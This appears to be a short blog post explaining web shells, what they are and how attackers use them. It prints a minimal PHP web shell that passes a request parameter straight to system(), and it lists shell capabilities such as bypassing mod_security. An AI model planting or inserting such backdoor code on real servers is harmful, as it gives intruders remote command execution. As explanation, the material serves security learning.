What are the Webshells : Think like Elit


web shells

Web Shells are the programs or scripts that are written in PHP ,Perl ,Python and by many other scripting Languages. Web-shells can be uploaded on the servers and used to provide web based interface to work on Servers by commands.Shells are basically work like Back-doors that are run from any kind of browsers.
Web servers have become one of the main targets of malicious activity and are often a weak point within an organization’s infrastructure.Web Shells code is often deployed and forgotten or unmaintained by an organization, creating weak points which are vulnerable to attack. The web shell script must be in the same language that the web server supports or is running (php, asp, jsp etc). So if its a php web server, then you need a php web shell. Web shells run purely over the web, therefore there is no socket communication like in case of reverse shells, where the webserver has to connect to a program like netcat on the hacker’s machine. Therefore web shells are quick to setup and use. Web shells can be defined as an undocumented way to gain console access to a computer system though a dynamic server side web page. Traditionally these web-shells were simple and easy to detect.

For example, let’s take the following PHP file:

if(isset($_REQUEST[‘cmd’]))
{
echo “”;
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
echo “”;
die;
}
?> 

web shells

This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:

Web shells provide a quick gui interface to do common tasks like :

1) Travel across directories
2) View files
3) Edit files
4) Download files
5) Delete files
6) Edit files
7) Upload files
8) Execute MySql queries / commands
9) Bypass mod_security
10) Permissions to directory/folders
11) Execute shell commands
Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s